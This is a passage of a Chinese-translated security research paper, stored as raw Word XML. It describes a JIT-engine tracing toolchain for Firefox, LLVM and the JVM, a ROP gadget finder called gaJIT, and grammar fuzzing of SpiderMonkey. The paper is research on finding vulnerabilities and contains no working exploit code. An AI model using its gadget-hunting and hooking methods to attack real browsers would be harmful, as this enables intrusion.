      <w:r w:rsidR="000D3EB1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>jitter</w:t>
      </w:r>
      <w:r>
        <w:t>工具链目前仅支持Firefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Tracemonkey，Firefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Jaegermonkey和LLVM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>JIT引擎。我们还开发了一个通用脚本，用于跟踪用户提供的JIT调用站点对VirtualAlloc或mmap的调用</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>此通用脚本可用于为新的JIT引擎引导更新的</w:t>
      </w:r>
      <w:r w:rsidR="000D3EB1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>jitter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>脚本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEA82BB" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78A5F581" w14:textId="7555768A" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="595"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>跟踪Firefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> JIT引擎需要对4.0.1 Win32 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mozjs.dll进行一些轻度的反向工程，以找到特定的JIT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000D3EB1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000D3EB1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>hook</w:t>
      </w:r>
      <w:r>
        <w:t>点。</w:t>
      </w:r>
      <w:r w:rsidR="000D3EB1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>jitter</w:t>
      </w:r>
      <w:r>
        <w:t>当前具有以下功能</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C85133" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="29"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CDFC467" w14:textId="4770499E" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="1248"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>VirtualProtect，VirtualA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>lloc，mmap，mprotect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>JaegerTrampoline的所有JIT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000D3EB1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>调用点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449A8E3A" w14:textId="77777777" w:rsidR="000D3EB1" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="5457"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>JaegerTrampoline返回</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>TrampolineCompiler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ::</w:t>
      </w:r>
      <w:r w:rsidR="000D3EB1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>compile</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3F7E8A12" w14:textId="551A735D" w:rsidR="0026102A" w:rsidRDefault="000D3EB1">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="5457"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>mijt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>TryCompile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="78EB6E1C" w14:textId="77777777" w:rsidR="000D3EB1" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="7759"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>PolyIC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000D3EB1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Stub</w:t>
      </w:r>
      <w:r w:rsidR="000D3EB1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Calls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7483A888" w14:textId="599C263D" w:rsidR="0026102A" w:rsidRPr="000D3EB1" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="7759"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>MonoIC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000D3EB1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Stub Calls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E55AFF" w14:textId="6B26B6CF" w:rsidR="0026102A" w:rsidRDefault="000D3EB1">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="exact"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ast Paths</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（这是一项正在进行的工作，因为有许多快速路径需要考虑）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE0D08F" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="33"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41ADFBC1" w14:textId="13C42EAE" w:rsidR="0026102A" w:rsidRDefault="000D3EB1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="595"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>jitter</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>还可以跟踪LLVM下的代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>生成</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，并通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> hook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">JIT :: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>NotifyFunctionEmitted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>来记录所有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>生成</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>点，通常由平台相关的代码生成器用来通知JIT引擎。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9FF40E" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="756287DD" w14:textId="6CD10708" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="595"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>一些JIT引擎已经提供了方便的挂钩来跟踪其内部例程。跟踪JVM代码的发出是通过JVM Tool Interface</w:t>
      </w:r>
      <w:r w:rsidR="000D3EB1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> hook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>执行的。跟踪库的源包含在</w:t>
      </w:r>
      <w:r w:rsidR="000D3EB1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>jitter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>中，并与OS X，Win32和Linux上的JVM一起使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60030DC3" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7033E201" w14:textId="4B811F23" w:rsidR="0026102A" w:rsidRDefault="000D3EB1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="501"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>jitter</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>工具链中还包括我们可重用的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>gaJIT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查找Ruby类。大多数ROP小工具分析工具仅在包含已加载的可执行模块或模块文件本身的内存上运行。这些工具不足以实现我们在JIT生产的代码页中找到可重复使用的重复代码模式的研究目标。我们的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>gaJIT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">查找脚本旨在使用抖动工具链的其他功能处理从内存中提取的原始缓冲区阵列。 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>gaJIT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>类完全独立于其他工具链，可以轻松用作通用ROP小工具查找器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11723D59" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66A831E8" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D8F826C" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_bookmark23"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>模糊测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658B4DB6" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="0026102A">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1360" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C312F36" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="10"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75ECFA43" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="93" w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="407"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在各种实现之间，我们对JIT引擎进行模糊处理的方法差异很大。对Web浏览器中的JavaScript JIT引擎进行模糊处理比在语言运行时对LLVM JIT进行模糊处理要容易得多。公共语言解释器漏洞和少数JIT漏洞已有很长的历史。正如我们在本文的上一节中讨论的那样，这些错误中有许多并未标记为安全。专门针对JIT引擎的后端代码发射生成器中的漏洞进行模糊测试非常困难。以下各节介绍了每种方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F49DFC4" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="701A2CC1" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_bookmark24"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JavaScript模糊测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3733DE0D" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="35"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BDA6EF7" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="283" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="595"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">从历史上看，客户端Web浏览器漏洞与DOM对象生命周期管理相关，而不是在核心JavaScript语言实现中。浏览器通常公开要由更高级别的脚本环境操纵的DOM，这可能导致核心脚本语言实现之外的许多问题。示例包括Firefox </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>nsDOMAttribute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> [8]漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DFD631" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="475"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（CVE-2010-3766）和Internet Explorer Aurora漏洞[9]（CVE-2010-0249），该漏洞在2010年被用于破坏Google系统。有许多此类问题的例子。尽管这些漏洞确实是可利用的并且很重要，但我们的模糊努力并非旨在找到它们。对于JavaScript JIT引擎，我们的模糊测试人员试图发现核心JavaScript语言实现（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SpiderMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）和后端JIT引擎（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JaegerMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>TraceMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）中的漏洞。 Mozilla JIT组件不允许通过已建立的API直接访问</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SpiderMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>字节码。该字节码由受信任的组件生成，因此被认为是安全的。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>因此，任何模糊测试都必须使用JavaScript进行</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5728F52F" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5952EEAE" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="427"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这就需要半智能的模糊器，它们试图避免语法相关的浅层错误。我们在Ruby中实现了JavaScript 1.8语法模糊器，并使用各种Ruby对象描述了语法，以表示类型，方法，控制流语句，运算符和关键字。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>该模糊器用于瞄准Mozilla</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> SpiderMonkey引擎，该引擎又将测试用例数据传播到JaegerMonkey和TraceMonkey引擎。我们使用SpiderMonkey引擎js </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell来快速高效地交付我们的测试用例</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">。 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell使用以下参数运行</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9B648C" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
